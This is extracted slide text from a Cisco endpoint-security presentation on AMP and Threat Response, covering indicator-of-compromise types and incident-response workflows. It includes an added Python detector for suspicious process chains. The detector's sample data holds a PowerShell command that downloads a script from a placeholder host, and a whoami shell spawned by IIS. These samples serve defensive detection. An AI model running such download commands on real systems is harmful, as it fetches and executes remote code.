Cisco Threat Response (CTR) (formerly known as Visibility)

Cisco Advanced Malware Protection

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Company

Products

Malware

Mindset

Strategy

Knowledge

Behavior

Complexity

Features

Detection Engines

Coverage

The history of Endpoint Protection

Probability

Detection?

Remediation?

Proactive?

Winner

Who wins the Race?

Hopefully you!

Processing

Company (Defender)

Products (Features)

Malware (Attacker)

Domain Names / IP Address

Hash Values

Network/Host Artifacts

TTPs / Tools

Levels

Tough!

Challenging

Annoying

Simple

Easy

Trivial


From Event to Context

• Context simplifies complexity

• Provides a completely different view of your threat landscape

• Context aware is not a product, it is more a capability and approach

• Context is the relationship between information and artifacts

IP, URL, Domain

Flow Correlation

Behavior

Events

Context


From Event to Context – what can be included

Event(s)

Events from various point products.

Context

Includes much information. Events are one part only.


Endpoint Challenges

Result: 20 min. with Win 10 (Procmon)

Threat Intelligence Counters by Talos

• Too much data to handle on-premise

• Too much data to handle directly on the client

• Threat landscape is too complex to be handled on the endpoint only

• Another approach is necessary

• 46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,996,895,529 unique hashes per week


N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Engines / Technologies

Signatures Based

Advanced Techniques

Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

Host based IPS

Advanced Analytics

When needed?

Configuration

Endpoint Configuration

Cloud and Intelligence

When querying cloud

or other intelligences

Start

Something comes up

at the endpoint.

1 of 46 Million

Endpoint Protection – Traditional Approach



Behavior Cluster

Malicious behaviour cluster including hundreds/thousands/millions of artifacts and also including one or more Threat Events

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Endpoint Protection – Traditional Approach

Timeline in one direction

Time window from ms/sec.

No information beyond Threat Events

Integrations

Intelligence, Product, SIEM

Endpoint Protection – Traditional Approach

Engines / Technologies

Signatures Based

Advanced Techniques / Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

Host based IPS

Cloud Information

Information for different types of artefacts

File Hashes

Certificate Information

Remediation infos

IP/URL Reputation

Management

Policies, Events

Logging

Reports

Updates/Upgrades

Timeline in one direction

Timewindow from ms/sec.

No information beyond Threat Events

Threat landscape complexity

Resource intensive

Event Management

Event Rating

Visibility

Endpoint Protection

Knowledge/Resource/Design Gap

GOAL: Fix these gaps

Endpoint Protection – New Generation Strategy

Endpoint Connector Endpoint Backend

Endpoint Prevention

Advanced Techniques

Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

**Signature Based

Endpoint Protection Endpoint Mgmt.

Management

Events

Policies

Reporting

Threat Information Integration

Activity Storage

Endpoint Mgmt.

Endpoint Monitoring

Disk Activity Monitoring

Network Monitoring

Device Flow Correlation

Endpoint IOC

Command Line Capture

Endpoint Monitoring

Backend Intelligence

Intelligence

Indication of Compromise Calculation

Data Enrichment

Cloud Analysis Features

Backend Intelligence

Endpoint Protection – New Generation Strategy

Endpoint Connector Endpoint Backend

3rd Party

Integration (APIs)

Sharing (APIs)

Threat Feeds

Existing Infrastructure

Perimeter

Web and E-mail

Network Anomaly

Encrypted Traffic Analysis

NGFW/IPS

Agentless Detection

Weblog Analysis (CTA)

DNS Based Security

Advanced Analytics

Static Analysis

Dynamic Analysis

Threat Intelligence Group

Research, Traps and Telemetry

Research and Efficacy Team (RET)

Cisco Product Security Incident Response Team (PSIRT)

Endpoint Prevention

Advanced Techniques

Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

**Signature Based

Endpoint Protection

Communication Platform

Endpoint Mgmt.

Management

Events

Policies

Reporting

Threat Information Integration

Activity Storage

Endpoint Mgmt.

Endpoint Monitoring

Disk Activity Monitoring

Network Monitoring

Device Flow Correlation

Endpoint IOC

Command Line Capture

Endpoint Monitoring

Backend Intelligence

Intelligence

Indication of Compromise Calculation

Data Enrichment

Cloud Analysis Features

Backend Intelligence


3rd Party

Existing Security

Talos

Threat Intelligence

Cognitive Analytics

Network

Agentless Detection

Anomaly

ETA

Start

Something comes up in the enterprise including managed and unmanaged devices

Endpoint Behavior

Collecting Artifacts, Behavior, Network Activity, …

Start

Something comes up

at the endpoint

Content

Web

E-mail

From Event to Context – Continuous Monitoring

Changing Time Window from ms/sec. to weeks

Time to both directions

Intelligence

Moving resource-intensive analysis from the endpoint to the cloud.

Endpoint Events

Disposition, Reaction, Action, Details



Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

3rd Party

Existing Security

Talos

Threat Intelligence

Cognitive Analytics

Network

Agentless Detection

Anomaly

ETA

Start

Something comes up in the enterprise including managed and unmanaged devices

Endpoint Behavior

Collecting Artifacts, Behavior, Network Activity, …

Start

Something comes up

at the endpoint

Content

Web

E-mail

From Event to Context – Continuous Monitoring

Endpoint Events

Disposition, Reaction, Action, Details

Continuous Monitoring 7x24x365

RETROSPECTION

VISIBILITY



Endpoint(s)

Endpoint Software

3rd Party

Existing Security

Talos

Threat Intelligence

Cognitive Analytics

Network

Agentless Detection

Anomaly

ETA

Content

Web

E-mail

From Event to Context – Continuous Monitoring

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Indications of Compromise

Cloud Based

Local Calculated

Manual IOC File Upload


Event Based: Traditional Approach

Context Based: AMP Visibility Approach

From Event to Context – Summary


Disk Memory

Sophisticated Malware Example - Infection

Code Installation

Malware installed

Code Injection

Binary Data

Dynamically created content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown?

WORKING: Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL

.ISO .OCX .EXE

ews.exe

Dropped Payload,

automatically executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed


Disk Memory

Sophisticated Malware Example – Post Infection


All unwanted malicious behavior

Status: Clean

No Sample, no Signature

Infection Vector unknown

Time-to-detect infected host

Single File not malicious

C&C Communication

Data Loss

Which Artifacts are left for investigation?

Which Information is available for investigation?


Sample IOC Events:

Event list for Generic IOC.


IOC Event Detail Examples

Generic IOC: Powershell Download

Generic IOC: W32.Poweliks Persistence

Generic IOC: Possible Privilege Escalation Attempt Detected


AMP4E Calculating Indication of Compromise - 1

Calculation from observed activity over the last 7 days

Info

Threat Detected - One or more malware detections were triggered on the computer.

Potential Dropper Infection - Potential dropper infections indicate a single file is repeatedly attempting to download malware onto a computer.

Multiple Infected Files - Multiple infected files indicate multiple files on a computer are attempting to download malware.

Executed Malware - A known malware sample was executed on the computer. This can be more severe than a simple threat detection because the malware potentially executed its payload.

Suspected botnet connection - The computer made outbound connections to a suspected botnet command and control system.

[Application] Compromise - A suspicious portable executable file was downloaded and executed by the application named, for example Adobe Reader Compromise.

[Application] launched a shell - The application named executed an unknown application, which in turn launched a command shell, for example Java launched a shell.

Generic IOC - Suspicious behavior that indicates possible compromise of the computer.

Suspicious download - Attempted download of an executable file from a suspicious URL. This does not necessarily mean that the URL or the file is malicious, or that the endpoint is definitely compromised. It indicates a need for further investigation into the context of the download and the downloading application to understand the exact nature of this operation.

AMP Cloud/Appliance Cloud Service Not available


AMP4E Calculating Indication of Compromise - 2

Calculation from observed activity over the last 7 days

Info

Suspicious Cscript Launch - Internet Explorer launched a Command Prompt, which executed cscript.exe (Windows Script Host). This sequence of events is generally indicative of a browser sandbox escape ultimately resulting in execution of a malicious Visual Basic script.

Suspected ransomware - File names containing certain patterns associated with known ransomware were observed on the computer. For example, files named help_decrypt.<filename> were detected.

Possible webshell - the IIS Worker Process (w3wp) launched another process such as powershell.exe. This could indicate that the computer was compromised and remote access has been granted to the attacker.

Cognitive Threat - Cisco Cognitive Threat Analytics uses advanced algorithms, machine learning, and artificial intelligence to correlate network traffic generated by your users and network devices to identify command-and-control traffic, data exfiltration, and malicious applications. A Cognitive Threat Indication of Compromise event is generated when suspicious or anomalous traffic is detected in your organization. Only threats that CTA has assigned a severity of 7 or higher are sent to AMP for Endpoints.

AMP Cloud/Appliance Cloud Service Not available
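As an added example (not Cisco's code and not taken from the slides), the parent/child process relationships behind the "Possible webshell", "Suspicious Cscript Launch" and "[Application] launched a shell" IOCs above, plus the "Powershell Download" generic IOC, written as detection logic over a constructed set of process-creation events; the pids, image names and command lines are invented, and real AMP telemetry has a different shape.

```python
from typing import Dict, List, NamedTuple, Optional, Tuple

class ProcEvent(NamedTuple):
    """One process-creation record; constructed shape, not AMP's telemetry format."""
    pid: int
    ppid: int
    image: str          # executable name, lower-case
    cmdline: str = ""   # captured command line, where available

SHELLS = {"cmd.exe", "powershell.exe"}
# Applications the slides name as typical "[Application] launched a shell" parents.
NAMED_APPS = {"iexplore.exe", "acrord32.exe", "winword.exe", "java.exe"}

def ancestors(events: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Image names walking up from pid: [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in events and pid not in seen:   # seen-set guards against pid reuse loops
        seen.add(pid)
        chain.append(events[pid].image)
        pid = events[pid].ppid
    return chain

def classify(events: Dict[int, ProcEvent], pid: int) -> Optional[str]:
    """Map one creation event to the first matching IOC name from the slides."""
    ev = events[pid]
    chain = ancestors(events, pid)
    parent = chain[1] if len(chain) > 1 else None
    grand = chain[2] if len(chain) > 2 else None
    if parent == "w3wp.exe" and ev.image in SHELLS:       # IIS worker spawned a shell
        return "Possible webshell"
    if ev.image == "cscript.exe" and parent == "cmd.exe" and grand == "iexplore.exe":
        return "Suspicious Cscript Launch"                  # IE -> cmd -> cscript
    if ev.image in SHELLS and parent not in SHELLS and grand in NAMED_APPS:
        return f"{grand} launched a shell"                  # app -> unknown app -> shell
    if ev.image == "powershell.exe" and "downloadstring" in ev.cmdline.lower():
        return "Generic IOC: Powershell Download"           # relies on command line capture
    return None

def evaluate(event_list: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, ioc) for every event that matched a rule."""
    events = {e.pid: e for e in event_list}
    return [(pid, ioc) for pid in events if (ioc := classify(events, pid))]

# Constructed sample: pids, images and command lines are invented for illustration.
SAMPLE = [
    ProcEvent(1, 0, "explorer.exe"), ProcEvent(2, 1, "w3wp.exe"),
    ProcEvent(3, 2, "powershell.exe", "powershell.exe -c whoami"),
    ProcEvent(4, 1, "iexplore.exe"), ProcEvent(5, 4, "cmd.exe"),
    ProcEvent(6, 5, "cscript.exe", "cscript.exe update.vbs"),
    ProcEvent(7, 1, "acrord32.exe"), ProcEvent(8, 7, "unknown.exe"), ProcEvent(9, 8, "cmd.exe"),
    ProcEvent(10, 1, "powershell.exe",
              "powershell.exe -Command (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"),
    ProcEvent(11, 1, "notepad.exe"),
]
```

Note that pid 5 (Internet Explorer directly starting cmd.exe) fires nothing: the slide's "launched a shell" definition requires the unknown intermediate application, which is why the rule checks the grandparent.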


Incident Management without Threat Response


The power of connected intelligences

E.g. Co-Occurrence Model

Cloud Based IOCs

Threat Correlation

Retrospection

Log Lines > Anomaly Detection

-> 5-10% of Traffic left

Trust Modeling

-> Long-term prediction model

Events Classification

-> Naming for Events

Relationship Modeling ->

Aggregate with Endpoint Information

(Same Threat, Same Attacker)

Threat Feeds

Worldwide Sensors

Several automated, artificial-intelligence-supported systems

TALOS

AMP & TG

CTA

Umbrella

Common theme or goal


Deliver

System back to user

Deliver to User

Format Device

Find

Where, who, how, when….

Find the Malware

Disk Forensics

On-Demand Scan

Manual Search

Knowledge?

Full Disk Forensics

Availability

Client not available

User on PTO

No Sensor

Different Department

Availability

Ticketing

Defined Process?

Open Ticket

Verify

Verify the event e.g. if further analysis is necessary

Verify

Searching

Search in SIEM or other available information sources, log files and so on.

Search in SIEM

Alert

Malware Alert from a single point of product

Malware Alert

Incident Response (IR) without Cisco Threat Response (CTR)

Timeline (Hours? Days? Weeks?)

Format

Most information lost


Q1 - Commodity/Targeted?

Q2 - Persistency?

Q3 - Ransom/Backups?

Q4 - Lateral movement?

Q5 - Clean/Format?

Steps

What next?

Next Steps

a.exe

Hash: 92a6…………7a

Result

Result

Analysis Tools

Process Explorer

Wireshark

Full Disk Forensics

Other Tools

Tools

Search on Client

Search in SIEM

Q1 - DHCP info?

Q2 - AD info?

Q3 - CMDB info?

Q4 - Vulnerability info?

Q5 - AV info?

Q6 - Who is doing the C&C?

Alert by Next-Gen Network

• C&C Traffic Detected:

• Destination: 52.28.249.128

• Source: 10.0.2.11

• Pcap Capture available?

Threat Intelligence?

Q, Q, Q, Q, Q, Q, ?

C&C Traffic Alert

Timeline (Hours? Days? Weeks?)

IR without CTR – C&C traffic alert!!

Searching

Sources?

Intelligences?

Correlations?

Payload

OS

Hardware


Endpoint Protection Approach Dilemma

Threat Event?

Threat Event?

Threat Event?

Blind Spots for Investigations

Dependencies

Network Connections

Other relevant information for investigation


Chkdsk.exe

Network connection and drops/executes a malicious file.

Activity

Malicious File starts chkdsk.exe

Activity

Create, execute and network connection

IOC?

Application X generated and executed an unknown application Y….

PDF created

Execution

Application X was executed by application Y

IOC Vulnerability

Application with vulnerability

IR with CTR – Example

Network

Established network connections


Unknown PE

Application “unknown” was executed by a.exe.

IR with CTR – Response (Retrospection)


Let's start

• LAB 1: Info from C-Level….

• LAB 2: User got phished….

• LAB 3: So many events…..

• LAB 4: Use your skills….